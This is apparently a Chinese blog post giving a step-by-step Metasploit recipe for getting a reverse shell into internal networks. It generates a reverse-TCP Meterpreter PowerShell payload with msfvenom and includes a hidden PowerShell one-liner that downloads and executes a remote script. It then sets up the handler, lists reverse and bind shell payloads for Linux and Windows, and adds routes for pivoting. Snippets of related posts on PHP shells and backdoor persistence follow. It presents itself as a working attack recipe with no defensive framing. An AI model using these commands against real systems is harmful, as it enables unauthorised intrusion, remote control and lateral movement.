msf反彈shell內網滲透

2021-09-28 16:42:38 字數 1492 閱讀 4188

1. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=《本機ip位址》 lport=《本機監聽埠》 -f psh-reflection  -o xx.ps1   //生成檔案放在目標機目錄下

//powershell執行指令碼:powershell -windowstyle hidden -exec bypass iex (new-object  net.webclient).downloadstring('http:/');***.ps1

2. use exploit/multi/handler

3. set payload windows/x64/meterpreter/reverse_tcp

4. show options

5. set lhost=***    rhost=***

6. run

7. 目標主機執行木馬檔案

格式:msfvenom -p -a --platform -e -i -b -n -f -o

// -e 常用編碼    x86/shikata_ga_nai      cmd/powershell_base64

// -f指指定的可執行檔案型別   -o 指定輸出位址。

反向連線:

linux:

windows:

正向連線:

linux:

windows:

use exploit/multi/handler

linux:

linux/x86/meterpreter/reverse_tcp  //反向payload

linux/x86/meterpreter/bind_tcp       //正向payload

linux/x86/shell_bind_tcp

linux/x86/shell_reverse_tcp

linux/x64/shell_reverse_tcp

linux/x64/shell_bind_tcp

windows:

windows/meterpreter/reverse_tcp    //反向payload

windows/meterpreter/bind_tcp         //正向payload

windows/shell_reverse_tcp

windows/shell_bind_tcp

windows/x64/meterpreter/reverse_tcp

windows/x64/meterpreter/bind_tcp

windows/x64/shell_reverse_tcp

windows/x64/shell_bind_tcp

set  .....

runroute add 《目標ip> 《目標子網掩碼》

示例:route add 10.0.0.1 255.0.0.0 1       //最後的1為新增該路由到session 1

php結合msf反彈內網shell

感謝 perl6大佬分享的姿勢。msf msf use payload php bind php msf exploit handler set payload payload php bind php msf exploit handler set rhost 目標內網ip msf payload...

內網滲透 許可權維持 MSF

msf路徑 usr share 製作後門 msfvenom windows示例 遠控流程 2.開啟msf並進入handle模組 3.設定payload型別 必須與第一步一致 4.設定lhost和lport 與第一步生成的後門一致 5.options檢視配置是否正確 6.run執行 bg將程序放到後台...

內網滲透之msf工具詳解

一.檔案目錄 date目錄 儲存資料 documentation目錄 文件目錄 lib目錄 儲存ruby指令碼 modules目錄 儲存模組和外掛程式 tools目錄 儲存小工具 二.基礎使用 msfdb init 初始化並啟動資料庫 db status 檢視資料庫狀態 msfconsole 控制台...